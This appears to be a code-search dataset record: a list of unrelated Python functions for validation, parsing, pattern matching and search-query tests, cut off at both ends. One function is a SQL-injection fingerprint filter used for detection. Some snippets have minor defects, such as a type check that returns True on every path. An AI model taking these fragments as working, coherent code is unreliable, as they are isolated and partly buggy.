content_names_types[content_name][0]\n last_content_type = content_names_types[content_name][1]\n if last_content_type != content_type:\n return (\n False,\n \"Content '{}' with type '{}' under performative '{}' is already defined under performative '{}' with a different type ('{}').\".format(\n content_name,\n content_type,\n performative,\n last_performative,\n last_content_type,\n ),\n None,\n None,\n )\n\n content_names_types[content_name] = (performative, content_type)\n\n for sub_type in (\n list(_get_sub_types_of_compositional_types(content_type))\n if _is_compositional_type(content_type)\n else []\n ) + [content_type]:\n if _is_valid_ct(sub_type):\n custom_types_set.add(sub_type.strip())\n\n return True, \"Speech-acts are valid.\", performatives_set, custom_types_set", "def validate(self, s):\n if len(s) == 0:\n return False\n if s in self.whitelist:\n return True\n if s in self.blacklist:\n return False\n\n # SQL Types are rarely used\n if 't' in s and 'f(t' not in s and 'At' not in s:\n return False\n\n if '1nf' in s:\n return False\n if 's1o' in s:\n return False\n if 'oo' in s:\n return False\n if 'v,s' in s:\n return False\n if 's,v' in s:\n return False\n if 'v,v' in s:\n return False\n if 'v,1' in s:\n return False\n if 'v,n' in s:\n return False\n if 'n,v' in s:\n return False\n if '1,v' in s:\n return False\n if 'Eo(' in s:\n return False\n if '(o(' in s:\n return False\n if '(o1' in s:\n return False\n if '(on' in s:\n return False\n if '(os' in s:\n return False\n if '(of' in s:\n return False\n if '(ov' in s:\n return False\n if 'B(n)' in s:\n return False\n if 'oso' in s:\n return False\n if 'o1o' in s:\n return False\n if 'ono' in s:\n return False\n\n # only 1 special case for this\n # 1;foo:goto foo\n # 1;n:k\n # the 'foo' can only be a 'n' type\n if ':' in s and not 'n:' in s:\n return False\n\n if '11' in s:\n return False\n\n if '))' in s:\n return False\n if '((' in s:\n return False\n if 'v1' in s:\n return False\n\n if 'nv' in s and ';T' not in s:\n return False\n if 'nn' in s and ';T' not in s:\n return False\n\n # select @version foo is legit\n # but unlikely anywhere else\n if 'vn' in s and 'Evn' not in s:\n return False\n\n if 'oE' in s:\n return False\n\n if 'A1' in s:\n return False\n if 'An' in s:\n return False\n if 'A(1' in s:\n return False\n\n if 'vov' in s:\n return False\n if 'vo1' in s:\n return False\n if 'von' in s:\n return False\n\n if 'ns' in s:\n if 'U' in s:\n return True\n if 'T' in s:\n return True\n return False\n\n if 'sn' in s:\n # that is... Tsn is ok\n if s.find('T') != -1 and s.find('T') < s.find('sn'):\n return True\n return False\n\n # select foo (as) bar is only nn type i know\n if 'nn' in s and 'Enn' not in s and ';T' not in s:\n return False\n\n if ',o' in s:\n return False\n\n if 'kk' in s and 'Tkk' not in s:\n return False\n\n if 'ss' in s:\n return False\n\n if 'ff' in s:\n return False\n\n if '1no' in s:\n return False\n\n if 'kno' in s:\n return False\n\n if 'nEk' in s:\n return False\n\n if 'n(n' in s:\n return False\n if '1so' in s:\n return False\n if '1s1' in s:\n return False\n if 'noo' in s:\n return False\n if 'ooo' in s:\n return False\n\n if 'vvv' in s:\n return False\n\n if '1vn' in s:\n return False\n if '1n1' in s:\n return False\n if '&1n' in s:\n return False\n if '&1v' in s:\n return False\n if '&1s' in s:\n return False\n if 'nnk' in s:\n return False\n if 'n1f' in s:\n return False\n # folded away\n if s.startswith('('):\n return False\n\n if '&o' in s:\n return False\n\n if '1,1' in s:\n return False\n if '1,s' in s:\n return False\n if '1,n' in s:\n return False\n if 's,1' in s:\n return False\n if 's,s' in s:\n return False\n if 's,n' in s:\n return False\n if 'n,1' in s:\n return False\n if 'n,s' in s:\n return False\n if 'n,n' in s:\n return False\n if '1o1' in s:\n return False\n if '1on' in s:\n return False\n if 'no1' in s:\n return False\n if 'non' in s:\n return False\n if '1(v' in s:\n return False\n if '1(n' in s:\n return False\n if '1(s' in s:\n return False\n if '1(1' in s:\n return False\n if 's(s' in s:\n return False\n if 's(n' in s:\n return False\n if 's(1' in s:\n return False\n if 's(v' in s:\n return False\n if 'v(s' in s:\n return False\n if 'v(n' in s:\n return False\n if 'v(1' in s:\n return False\n if 'v(v' in s:\n return False\n\n if s.startswith('n('):\n return False\n\n if s.startswith('vs'):\n return False\n\n if s.startswith('o'):\n return False\n\n if ')(' in s:\n return False\n\n # need to investigate T(vv) to see\n # if it's correct\n if 'vv' in s and s != 'T(vv)':\n return False\n\n # unlikely to be sqli but case FP\n if s in ('so1n)', 'sonoE'):\n return False\n\n return True", "def match(self, data_instance: Dict[str, Any]) -> bool:", "def validate_format(self):\n return all(\n [\n self.validate_header_keyword(),\n self.validate_type_keyword(),\n self.validate_type_annotations(),\n self.validate_unique_header(),\n self.validate_against_header_count(),\n ]\n )", "def _run_parse_checks(cls, line, filepath, logger=None):\n\n check_funcs = [\n cls.check_column_count,\n cls.check_date_column,\n cls.check_amount_column,\n ]\n checks = [partial(check, line) for check in check_funcs]\n is_parsable = all((check() for check in checks)) # NB short circuit\n logger = logger or logging.getLogger(cls.__name__)\n logger.debug(\"can %s parse this file? %s, %s\" %\n (cls.__name__, \"true\" if is_parsable else \"false\", filepath))\n return is_parsable", "def is_valid_para(self, para_type, type_table):\n # The values of the table contain all known destination types\n if para_type in type_table.values():\n return True\n return True", "def _check_alet_dict(text: str, text_type: str, alet_dict: dict, last_nouns: list) -> (list, str):\n agent_match = [] # Match of text and type\n agent_text_match = [] # Match of text only, not type\n loc_text_match = []\n event_text_match = []\n if not text_type or 'PERSON' in text_type or text_type.endswith('ORG') or \\\n text_type.endswith('GPE') or text_type.endswith('NORP') or text_type.endswith('NOUN'):\n agent_arrays = alet_dict['agents'] if 'agents' in alet_dict else []\n for agent_array in agent_arrays:\n alt_names = agent_array[0]\n agent_type = agent_array[1]\n if text not in personal_pronouns and text in alt_names:\n if text_type and (text_type in agent_type or agent_type in text_type):\n agent_match.append((agent_type, agent_array[2])) # index 2 holds the IRI\n break\n else:\n agent_text_match.append((agent_type, agent_array[2]))\n if not text_type or 'LOC' in text_type or 'GPE' in text_type or 'FAC' in text_type or 'NOUN' in text_type:\n loc_arrays = alet_dict['locs'] if 'locs' in alet_dict else []\n for loc_array in loc_arrays:\n alt_names = loc_array[0]\n loc_map = loc_array[1]\n if text in alt_names:\n loc_text_match.append((loc_map, loc_array[2])) # index 2 holds the IRI\n if not text_type or 'EVENT' in text_type or 'NOUN' in text_type:\n event_arrays = alet_dict['events'] if 'events' in alet_dict else []\n for event_array in event_arrays:\n alt_names = event_array[0]\n if text in alt_names:\n # event_array[1] holds the class mappings and [2] holds the IRI\n event_text_match.append((event_array[1], event_array[2]))\n return (_update_last_nouns(text, agent_match[-1][0], agent_match[-1][1], [get_agent_or_loc_class(text_type)],\n last_nouns) if agent_match\n else (_update_last_nouns(text, agent_text_match[-1][0], agent_text_match[-1][1],\n [get_agent_or_loc_class(text_type)], last_nouns) if agent_text_match\n else (_update_last_nouns(text, text_type, loc_text_match[-1][1], loc_text_match[-1][0], last_nouns)\n if loc_text_match\n else (_update_last_nouns(text, text_type, event_text_match[-1][1], event_text_match[-1][0],\n last_nouns) if event_text_match else [], empty_string))))", "def VerifyStructure(self, parser_mediator, lines):\n match_generator = self._LINE_GRAMMAR.scanString(lines, maxMatches=1)\n return bool(list(match_generator))", "def process_mango(self):\n to_ret = False\n curr_parser = MangoParser()\n all_mango_types = curr_parser.Parse(self.target_mango_file, self.target_engine, self.target_blender_factory)\n if len(all_mango_types) > 0:\n to_ret = True\n return to_ret", "def match_list(column, patterns):\n for pattern in patterns:\n if pattern.match(column):\n return True\n return False", "def test_syntax_converter_expand_search_patterns_multiple(self):\n spi_search = \"find t bob sam and k couch\"\n inv_search = \"title:bob and title:sam and keyword:couch\"\n self._compare_searches(inv_search, spi_search)", "def _is_valid_pt(content_type: str) -> bool:\n content_type = content_type.strip()\n return content_type in SPECIFICATION_PRIMITIVE_TYPES", "def _match_entry_type_string(code_entry, string_list):\n entry_type = re.match(r\"<(AST.*):.*\", code_entry.get('type')).group(1)\n return bool(entry_type in string_list)", "def test_match(self, url, criterions=[], har=None):\r\n return len(self.get_matches(url, criterions, har)) != 0", "def test_search_multiresults(self):\n self.assertEquals(len(self.t['Scrubs'].search('my first')) >= 3, True)", "def matchLongestRE(stream,tokens):\n kind = None; block = ''\n for k,r in tokenTypes:\n m = r.match(stream.text)\n if m:\n g = m.group()\n #sys.stderr.write('%s: %s'%(k,g))\n if len(g) > len(block):\n kind = k\n block = g\n if kind:\n if not isSkipType(kind):\n if kind == '_keyword':\n token = Token(block)\n else:\n token = Token(kind,attr=block)\n token.setRowCol(stream.row, stream.col)\n tokens.append(token)\n stream.consumeChars(len(block))\n return True\n else:\n return False", "def test_combine_multiple_or(self):\n inv_search = 'author:\"ellis, j*\" and (title:report or keyword:\"cross section\")'\n spi_search = 'find a j ellis and (t report or k \"cross section\")'\n self._compare_searches(inv_search, spi_search)", "def test_type_arg(self, parse_input):\n with pytest.warns(SyntaxWarning, match=\"Only keyword options of the form\"):\n parse_input(\"name testname\\nversion 1.0\\ntarget example (6)\\ntype example (42)\")", "def _lineage_eval_text_match_rules(rules, text):\n\n for rule in rules:\n if TextMatch.dict_call(rule['test'], text, rule['expression']):\n return True\n return False", "def is_select_multiple(self) -> bool:\n select_multiple_starts = (\n 'select_multiple ',\n 'select_multiple_external ',\n )\n row_type = self.get_type()\n return any(row_type.startswith(item) for item in select_multiple_starts)", "def check_range(self, csvop, mtype, stype, flavor, pt, eta, discr):\n allowed_range = self.allowed[(csvop, mtype, stype, flavor)]\n\n eta = abs(eta)\n allowed = all([\n eta >= allowed_range['etaMin'], eta <= allowed_range['etaMax'],\n pt >= allowed_range['ptMin'], pt <= allowed_range['ptMax'],\n discr >= allowed_range['discrMin'], discr <= allowed_range['discrMax'],\n ])\n\n if not allowed and self.verbose>2:\n print 'pt %6.1f <? %6.1f <? %6.1f' % (allowed_range['ptMin'], pt, allowed_range['ptMax'])\n print 'eta %4.1f <? %4.1f <? %4.1f' % (allowed_range['etaMin'], eta, allowed_range['etaMax'])\n print 'discr %4.1f <? %4.1f <? %4.1f' % (allowed_range['discrMin'], discr, allowed_range['discrMax'])\n\n return allowed", "def is_valid_index (wordsearch, line_num, col_num):\n if ((line_num >= 0) and (line_num < len(wordsearch))):\n if ((col_num >= 0) and (col_num < len(wordsearch[line_num]))):\n return True\n return False", "def validate_type_annotations(self):\n valid = False\n invalid_types = []\n # skipping the TYPE keyword, iterate through the types\n # collecting invalid type annotations in list annots\n for t in self.annot_types[1:]:\n if t.lower() not in (\"group\", \"numeric\"):\n # if the value is a blank space, store a higher visibility\n # string for error reporting\n if \"Unnamed\" in t:\n invalid_types.append(\"<empty value>\")\n # Duplicated metadata header name causes type annotation issue.\n # Side effect of Pandas adding a suffix to uniquefy the header.\n # These invalid annotations should not be included in invalid\n # type annotation count. This exception may cause miscount of\n # type annot errors if user-supplied annotation has period.\n elif \".\" in t:\n pass\n else:\n invalid_types.append(t)\n if invalid_types:\n msg = 'TYPE row annotations should be \"group\" or \"numeric\"'\n self.store_validation_issue(\n \"error\",\n msg,\n \"format:cap:group-or-numeric\",\n associated_info=invalid_types,\n )\n else:\n valid = True\n return valid", "def check_span_indexes(row, print_mismatch=False):\n\n span1 = \"\"\n span2 = \"\"\n signal = \"\"\n\n try:\n for arg in row[\"idx\"][\"span1\"]:\n span1 += row[\"context\"][arg[0]:arg[1]] + \" \"\n\n for arg in row[\"idx\"][\"span2\"]:\n span2 += row[\"context\"][arg[0]:arg[1]] + \" \"\n\n for sig in row[\"idx\"][\"signal\"]:\n signal += row[\"context\"][sig[0]:sig[1]] + \" \"\n\n flags = {'s1': False, 's2': False, 'sig': False, 'context': False}\n if span1.strip() != (\" \".join(row[\"span1\"])).strip():\n if print_mismatch:\n print(\"span1: [{}]\\n[{}]\".format(span1, (\" \".join(row[\"span1\"])).strip()))\n flags[\"s1\"] = True\n if span2.strip() != (\" \".join(row[\"span2\"])).strip():\n if print_mismatch:\n print(\"span2: [{}]\\n[{}]\".format(span2, (\" \".join(row[\"span2\"])).strip()))\n flags[\"s2\"] = True\n if signal.strip() != (\" \".join(row[\"signal\"])).strip():\n if print_mismatch:\n print(\"signal: [{}]\\n[{}]\".format(signal, (\" \".join(row[\"signal\"])).strip()))\n flags[\"sig\"] = True\n if str(row[\"context\"]) == \"nan\":\n flags[\"context\"] = True\n if any(a for a in flags.values()):\n if print_mismatch:\n print(\"context: [{}] \\n========\".format(row[\"context\"]))\n return False\n except Exception as e:\n return False\n return True", "def is_valid_posse(posse: 'Tuple'):\n # todo: write this as iterator through test types\n # could use test types as blocks for lambda calculus\n # for test in attribute tests:\n\n # print('testing posse: %s' % str(posse))\n\n prefixes = set()\n cases = set()\n lengths = set()\n letters = set()\n\n for member in posse:\n # prefix validity\n prefixes.add(member[0])\n\n # case validity\n if ord(member[1]) in THIRD_CASE:\n cases.add(2)\n elif member[1].isupper():\n cases.add(1)\n else:\n cases.add(0)\n\n # length validity\n lengths.add(len(member[1:]))\n\n # letter validity\n # print('letter validity for %s' % member)\n for letter_type in LETTER_SETS:\n if ord(member[1]) in LETTER_SETS[letter_type]:\n letters.add(letter_type)\n\n prefix_is_valid = len(prefixes) == 1 or len(prefixes) == 3\n case_is_valid = len(cases) == 1 or len(cases) == 3\n length_is_valid = len(lengths) == 1 or len(lengths) == 3\n letter_is_valid = len(letters) == 1 or len(letters) == 3\n\n # print('prefix_is_valid: %s' % prefix_is_valid)\n # print('case_is_valid: %s' % case_is_valid)\n # print('length_is_valid: %s' % length_is_valid)\n # print('letter_is_valid: %s' % letter_is_valid)\n\n return all((prefix_is_valid,\n case_is_valid,\n length_is_valid,\n letter_is_valid))", "def _can_handle_query(cls, *query):\n chkattr = [\"Time\", \"Instrument\", \"SatelliteNumber\"]\n chklist = [x.__class__.__name__ in chkattr for x in query]\n for x in query:\n if x.__class__.__name__ == \"Instrument\" and x.value.lower() in (\n \"xrs\",\n \"goes\",\n ):\n return all(chklist)\n return False", "def has_match_variables(self, response):\n return response.find(' wildcards: (') != -1", "def job_posting_matches(self, job_title_posting, html_posting):\n regex_keyword_title = re.compile(r'\\b(data|machine learning)\\b', flags=re.IGNORECASE)\n regex_bad_position_title = re.compile(r'\\b(manager|principal|professor|director|lead)\\b', flags=re.IGNORECASE)\n\n job_posting = BeautifulSoup(html_posting, 'html.parser').get_text()\n regex_language_posting = re.compile(r'python', flags=re.IGNORECASE)\n\n return regex_keyword_title.search(job_title_posting) and \\\n not regex_bad_position_title.search(job_title_posting) and \\\n regex_language_posting.search(job_posting)", "def _block_matches_all(block_json):\r\n # do the checks which don't require loading any additional data\r\n if (\r\n self._block_matches(block_json, kwargs) and\r\n self._block_matches(block_json.get('fields', {}), settings)\r\n ):\r\n if content:\r\n definition_block = self.db_connection.get_definition(block_json['definition'])\r\n return self._block_matches(definition_block.get('fields', {}), content)\r\n else:\r\n return True", "def _arguments_valid(self) -> bool:\n return self.find and self.near and self.max_results >= 1", "def isValidSearchQuery(self, searchQuery):\n if len(searchQuery) != 4:\n return False\n validSearchQueries = [[\"search\", \"client\", \"name\"],\n [\"search\", \"movie\", \"title\"],\n [\"search\", \"movie\", \"description\"],\n [\"search\", \"movie\", \"genre\"]]\n isValidQuery = False\n for query in validSearchQueries:\n if query[0] == searchQuery[0] and query[1] == searchQuery[1] and query[2] == searchQuery[2]:\n isValidQuery = True\n return isValidQuery", "def check_inputs(self, inputs):\n if self.debug:\n print(\"Checking inputs\")\n result = True\n for _input in inputs:\n if \"word_\" in _input and inputs[_input] == \"\":\n result = False\n elif \"idiom_\" in _input and inputs[_input] == \"\":\n if \"list\" not in _input:\n result = False\n return result", "def check_param(self, param_str):\n param_groups = None\n \"\"\" Initial param cosmetic adjustment \"\"\"\n param_str = param_str.strip()\n\n \"\"\" Cherck the param syntax \"\"\"\n for key, pattern in self.patterns.items():\n param_groups = re.fullmatch(pattern, param_str)\n if param_groups:\n return True\n return False", "def check_param(self, param_str):\n param_groups = None\n \"\"\" Initial param cosmetic adjustment \"\"\"\n param_str = param_str.strip()\n\n \"\"\" Cherck the param syntax \"\"\"\n for key, pattern in self.patterns.items():\n param_groups = re.fullmatch(pattern, param_str)\n if param_groups:\n return True\n return False", "def w_is_typed(tokens):\n return (\n 'type' in tokens or\n 'answerblock' in tokens or\n 'drawbox' in tokens or\n 'answerfigure' in tokens\n )", "def _can_handle_query(cls, *query):\n # Import here to prevent circular imports\n from sunpy.net import attrs as a\n\n required = {a.Time, a.Instrument}\n optional = {a.Wavelength, a.Level, a.goes.SatelliteNumber}\n all_attrs = {type(x) for x in query}\n\n ops = all_attrs - required\n # check to ensure that all optional requirements are in approved list\n if ops and not all(elem in optional for elem in ops):\n return False\n\n # if we get this far we have either Instrument and Time\n # or Instrument, Time and Wavelength\n check_var_count = 0\n for x in query:\n if isinstance(x, a.Instrument) and x.value.lower() == 'suvi':\n check_var_count += 1\n\n if check_var_count == 1:\n return True\n else:\n return False", "def is_multiquery(corpus, search, query, just_speakers):\n is_mul = False\n from collections import OrderedDict\n #if hasattr(corpus, '__iter__'):\n # is_mul = True\n # so we can do search = 't', query = ['NP', 'VP']:\n from corpkit.dictionaries.process_types import Wordlist\n if isinstance(query, Wordlist):\n query = list(query)\n if isinstance(query, list):\n if query != list(search.values())[0] or len(list(search.keys())) > 1:\n query = {c.title(): c for c in query}\n if isinstance(query, (dict, OrderedDict)):\n is_mul = True\n if just_speakers:\n if just_speakers == 'each':\n is_mul = True\n just_speakers = ['each']\n if just_speakers == ['each']:\n is_mul = True\n elif isinstance(just_speakers, STRINGTYPE):\n is_mul = False\n just_speakers = [just_speakers]\n #import re\n #if isinstance(just_speakers, re._pattern_type):\n # is_mul = False\n if isinstance(just_speakers, list):\n if len(just_speakers) > 1:\n is_mul = True\n if isinstance(search, dict):\n if all(isinstance(i, dict) for i in list(search.values())):\n is_mul = True\n return is_mul, corpus, search, query, just_speakers", "def parse(args, query):\n\n global query_type\n\n # Deal first with requests for definition or pronunciation\n # 1. Make the code easier to read\n first_word = args[0]\n second_word = args[1] if len(args) > 1 else \"\"\n third_word = args[2] if len(args) > 2 else \"\"\n fourth_word = args[3] if len(args) > 3 else \"\"\n # we use the teranary operator (this if ____ else that) to avoid an IndexError\n # IndexError would be raised if we tried to access the second element (args[1])\n # in a list which contained only one item (eg args == [\"lonely\"])\n # the teranary operator (in most languages it looks like \"____ ? this : that\")\n # returns \"this\" when the if is true and \"that\" when the if is false\n # meaning, if len(args) is NOT greater than 1, second_word == \"\"\n\n # 2. Check for keywords in the list of arguments\n # Example: nostrum defined\n # Example: pronunciation of otolaryngology\n if first_word == \"define\":\n # e.g. if the first word is \"define\" we'll add the second word to the query\n query = {\"sp\": second_word, \"md\": \"d\", \"max\": \"1\", \"qe\": \"sp\", \"ipa\": \"1\"}\n # the query is a dictionary of GET parameters for the http request, eg\n # https://api.datamuse.com/words?max=1&sp=SECOND_WORD_HERE&qe=sp&md=d&ipa=1\n elif second_word == \"defined\" or second_word == \"definition\":\n query = {\"sp\": first_word, \"md\": \"d\", \"max\": \"1\", \"qe\": \"sp\", \"ipa\": \"1\"}\n # this one uses string interpolation (the f\"\" stuff)\n elif f\"{second_word} {third_word}\" == \"means what\":\n query = {\"sp\": first_word, \"md\": \"d\", \"max\": \"1\", \"qe\": \"sp\", \"ipa\": \"1\"}\n elif f\"{second_word} {third_word} {fourth_word}\" == \"is said how\":\n query = {\"sp\": first_word, \"md\": \"r\", \"max\": \"1\", \"qe\": \"sp\", \"ipa\": \"1\"}\n # this one uses regular expressions -- i.e. if the second_word is \"of\" or \"for\"\n elif first_word == \"definition\" and re.match(r'(of)|(for)',second_word):\n query = {\"sp\": third_word, \"md\": \"d\", \"max\": \"1\", \"qe\": \"sp\", \"ipa\": \"1\"}\n # the is_pronounced function returns true if first_word is a (mis)spelling of pronounced\n elif re.match(r'(of)|(for)',second_word) and is_pronounced(first_word):\n query = {\"sp\": third_word, \"md\": \"r\", \"max\": \"1\", \"qe\": \"sp\", \"ipa\": \"1\"}\n # the ordering in the above list is not entirely random\n # since an if-elif-else statement won't keep evaluating after it finds a match\n # it makes sense to put the most computationally complex clauses at the end\n # >>> import timeit\n # >>> timeit.timeit('from word_helpers import is_pronounced; is_pronounced(\"pronounced\")', number=10000)\n # 0.022870146989589557\n # >>> timeit.timeit('args = [\"defined\"]; args[0] == \"defined\"', number=10000)\n # 0.002359684993280098\n # it takes 2 milliseconds to compare a string in a list 10,000 times\n # -- versus 2 centiseconds to run is_pronounced 10,000 times\n # (on my Intel Core i5 2.67GHz CPU -- obviously speed depends on the processor)\n # it's also worth noting that readability counts more than speed optimization (most of the time!)\n\n # Quick way to check if any of the above if statements matched\n if \"sp\" in query:\n # if so, we are done in this function\n if query[\"md\"] == \"r\": query_type = \"PRO\"\n if query[\"md\"] == \"d\": query_type = \"DEF\"\n return query\n\n # these will be useful later\n STOP_WORDS = (\"and\", \"meaning\", \"means\", \"max\", \"about\", \"which\", \"that\")\n\n # Parse more complicated requests for synonyms, etc\n # 0 is false in python, so this loop will run until we've removed all the args\n while len(args):\n # we must reset these vars each time the loop starts\n # in case we've deleted items from the args list\n first_word = args[0]\n second_word = args[1] if len(args) > 1 else \"\"\n third_word = args[2] if len(args) > 2 else \"\"\n # we use the teranary operator (this if ____ else that) to avoid an IndexError\n # IndexError would be raised if we tried to access the second element (args[1])\n # in a list which contained only one item (eg args == [\"lonely\"])\n # the teranary operator (in most languages it looks like \"____ ? this : that\")\n # returns \"this\" when the if is true and \"that\" when the if is false\n # meaning, if len(args) is NOT greater than 1, second_word == \"\"\n\n # Disambiguate homonym requests from spelling correction requests\n # Example: sounding like tung\n # Example: sounds like doe but spelled differently\n if re.match(r'sound((s)|(ing)) like',f\"{first_word} {second_word}\"):\n\n # again, use len(args) to avoid an IndexError\n if len(args) >= 6 and \\\n re.match(r'((but)|(except)) spelled different(ly)?',f\"{args[3]} {args[4]} {args[5]}\"):\n # but instead of teranary operator,\n # use \"short circuit logic\" -- when python sees \"if __A__ and __B__ \",\n # it knows that if A is false, the whole thing will be false\n # (you can't have \"ice cream and potatoes\" for dinner if you don't have ice cream)\n # and it won't waste time evaluating B, so re.match won't run and args[4]\n # won't be accessed and no IndexError will be raised, yay!\n # regex explained: ? means the prior thing matched zero or one times\n # different(ly)? matches \"different\" and \"differently\"\n query[\"rel_hom\"] = third_word\n # now, delete 6 items from args, starting at item 0\n del args[0:6]\n else:\n query[\"sl\"] = third_word\n del args[0:3]\n\n # Example: spelled like 'cens?r'\n elif re.match(r'spell((ed)|(ing)) like',f\"{first_word} {second_word}\"):\n # two stars (**) means \"unpack\" a dictionary\n # just like unpacking a suitcase, we've dumped the old contents of query\n # into a new dictionary (which we are saving with the same variable name!)\n query = {**query,\"sp\": third_word}\n # query[\"sp\"] = third_word also works fine\n # just showing off how to combine two dictionaries :)\n del args[0:3]\n\n # Example: rhymes with culminate\n elif len(args) > 2 and second_word == \"with\" and is_rhymes(first_word):\n query[\"rel_rhy\"] = third_word\n del args[0:3]\n\n # Example: almost rhymes with culminate\n elif len(args) > 3 and \\\n f\"{first_word} {third_word}\" == \"almost with\" and \\\n is_rhymes(second_word):\n query[\"rel_nry\"] = args[3] # fourth_word\n del args[0:4]\n\n # Example: comes after sea\n elif f\"{first_word} {second_word}\" == \"comes after\":\n query[\"lc\"] = third_word\n del args[0:3]\n elif first_word == \"follows\":\n query[\"lc\"] = second_word\n del args[0:2]\n elif f\"{first_word} {second_word}\" == \"comes before\":\n query[\"rc\"] = third_word\n del args[0:3]\n elif first_word == \"preceeds\":\n query[\"rc\"] = second_word\n del args[0:2]\n\n # Example: describes paint\n elif first_word == \"describes\":\n query[\"rel_jjb\"] = second_word\n del args[0:2]\n\n # Example: associated with feet\n elif f\"{first_word} {second_word}\" == \"associated with\" or \\\n f\"{first_word} {second_word}\" == \"triggered by\":\n query[\"rel_trg\"] = third_word\n del args[0:3]\n\n # Example: meaning feeling tired\n elif first_word in [\"means\",\"meaning\",\"like\"]:\n # get rid of first_word\n del args[0]\n # now short circuit logic again, plus using the tuple from ealier\n # b/c if we have \"meaning deer and sounds like roe\" we don't want\n # query[\"ml\"] == \"deer and sounds like roe\" -- it should be just \"deer\"\n while len(args) and args[0] not in STOP_WORDS:\n # teranary operator prevents KeyError if \"ml\" not already in query dictionary\n query[\"ml\"] = f\"{query['ml']} {args[0]}\" if \"ml\" in query else args[0]\n del args[0]\n # an example with the previous code to make things clearer\n # say args == [\"means\", \"egg\", \"beater\", \"and\", \"max\", \"35\"]\n # first_word IS in [\"means\",\"meaning\",\"like\"]\n # del first_word, args is now [\"egg\", \"beater\", \"and\", \"max\", \"35\"]\n # len(args) == 5, args[0] is NOT in STOP_WORDS\n # \"ml\" is NOT in query, so teranary returns args[0] (\"egg\")\n # args[0] is copied to query[\"ml\"] (query is now {ml: \"egg\"})\n # del args[0], args is now [\"beater\", \"and\", \"max\", \"35\"]\n # return to top of while loop, len(args) == 4, args[0] is NOT in STOP_WORDS\n # \"ml\" IS in query, so teranary returns f\"{query['ml']} {args[0]}\" (\"egg beater\") \n # f\"{query['ml']} {args[0]}\" is copied to query[\"ml\"]\n # (query is now {ml: \"egg beater\"})\n # del args[0], args is now [\"and\", \"max\", \"35\"]\n # return to top of while loop, len(args) == 3,\n # args[0] IS in STOP_WORDS (args[0] == \"and\")\n # DO NOT enter the while loop, continue past this code block\n\n # Discover the topic of our query\n elif first_word == \"about\":\n del args[0]\n count = 0\n # Datamuse allows a max of five topic words\n while len(args) and args[0] not in STOP_WORDS and count <= 5:\n query[\"topics\"] = f\"{query['topics']} {args[0]}\" if \"topics\" in query else args[0]\n del args[0]\n # count += 1 is the same as count = count + 1\n count += 1\n\n # How many results to return (max 1000)\n elif first_word in [\"max\", \"maximum\", \"only\"]:\n user_max = convert_num(second_word)\n if user_max and int(user_max) <= 1000:\n query[\"max\"] = user_max\n del args[0:2]\n\n # Remove filler words if they weren't parsed out above\n elif first_word in [\"that\",\"which\",\"and\",\"like\",\"is\"]:\n del args[0]\n\n # Add anything not otherwise parsable to the ml parameter\n else:\n query[\"ml\"] = f\"{query['ml']} {first_word}\" if \"ml\" in query else first_word\n del args[0]\n\n # this is the bottom of that massive while loop\n # if args is not empty by now, we'll start over from the top ^\n\n return query\n # and this is the end of the \"def parse(args, query)\" function\n # whew!", "def chatscriptMatch(self, args, f_type):\n\n try:\n pattern = self.bot.resolve_arg(args[0], f_type)\n except IndexError:\n raise BBotException({'code': 190, 'function': 'chatscriptMatch', 'arg': 0, 'message': 'Pattern in arg 0 is missing.'})\n\n try:\n input_text = self.bot.resolve_arg(args[1], f_type)\n except IndexError:\n raise BBotException({'code': 191, 'function': 'chatscriptMatch', 'arg': 1, 'message': 'Text in arg 1 is missing.'})\n\n try:\n entities_var_names = self.bot.resolve_arg(args[2], f_type)\n except IndexError:\n entities_var_names = [] # entities are optional\n\n result = False\n if len(input_text) > 0:\n # clear match variables first (ChatScript does not reset them when running testpattern)\n self.send(':do ^clearmatch()')\n # test the pattern\n cs_req = f\":testpattern ({pattern}) {input_text}\" #@TODO try sending direct text and running ^match later (it's faster. sends input text once)\n self.logger.debug(\"ChatScript request: \" + cs_req)\n cs_res = self.send(cs_req)\n self.logger.debug('ChatScript response: \\n' + str(cs_res))\n\n if not self.has_error(cs_res):\n result = self.is_match(cs_res)\n if result:\n self.logger.info('It\\'s a match!')\n else:\n self.logger.info('No match')\n # check if there are match variables set\n if self.has_match_variables(cs_res):\n self.store_variables_from_matched_variables(entities_var_names)\n else:\n self.logger.warning('Response returned with error')\n\n return result", "def check(self, text):\n lt = s = n = 0\n result = False\n for g in text:\n if g in LETTERS and lt < self.letters:\n lt += 1\n if g in NUMBERS and n < self.numbers:\n n += 1\n if g in SYMBOLS and s < self.symbols:\n s += 1\n if n == self.numbers and s == self.symbols and lt == self.letters:\n result = True\n break\n return result", "def parsePosition(self, parse):\n\n if len(parse) == 2:\n ch1 = ord(parse[0].lower())\n ch2 = ord(parse[1].lower())\n\n maxNum = 48 + self.board.size # ascii of max row #\n\n # [Row#][ColLetter]] case\n if 48 < ch1 <= maxNum and 97 <= ch2 < (97 + self.board.size):\n return maxNum - ch1, ch2 - 97 # actual grid indexes of desired position\n\n # [ColLetter][Row#] case\n if 48 < ch2 <= maxNum and 97 <= ch1 < (97 + self.board.size):\n return maxNum - ch2, ch1 - 97 # actual grid indexes of desired position\n return False", "def match_rules(rules, app, action):\n for rule in rules.split(','):\n rule_app, rule_action = rule.split(':')\n if rule_app == '*' or rule_app == app:\n if rule_action == '*' or rule_action == action or action == '%':\n return True\n return False", "def contains_match(self, regexp):\n # If the regexp is not found, find will return a tuple (-1, -1) in Sublime 3 or None in Sublime 2 \n # https://github.com/SublimeTextIssues/Core/issues/534\n contains_import = self.view.find(regexp, 0)\n return contains_import.size() > 0 if float(sublime.version()) >= 3000 else contains_import is not None", "def no_or_clauses (self,phrase):\r\n \r\n for x in phrase:\r\n if isinstance(x,list) and x[0] == '@':\r\n return False\r\n return True", "def matches(self):\n return False", "def match_skills(item):\n\n text = item.text\n if any([skill in text for skill in skill_names]):\n return True\n return False", "def in_range(self, index):\n for match in self.matches:\n if match.start_pos <= index < match.end_pos:\n return True\n\n return False", "def test_syntax_converter_expand_search_patterns_multiple_conjoined(self):\n spi_search = \"find t bob sam and couch\"\n inv_search = \"title:bob and title:sam and title:couch\"\n self._compare_searches(inv_search, spi_search)", "def test_match_types(self):\n f = lws.match_types\n # assert f(str, u'test') is True\n assert f(str, 'test') is True\n assert f(int, 123) is True\n assert f(int, 123.00) is False\n assert f(bool, [1, 2, 3]) is False", "def type_restrictions(data):\n\n exam_type = [\"main\", \"MAIN\", \"CAT\", \"cat\"]\n if data not in exam_type:\n return False\n return True", "def _match(self, rule, obj):\n\n for key in rule:\n if key == '$and':\n if not self.handle_and(key, rule[key], obj):\n return False\n\n elif key == 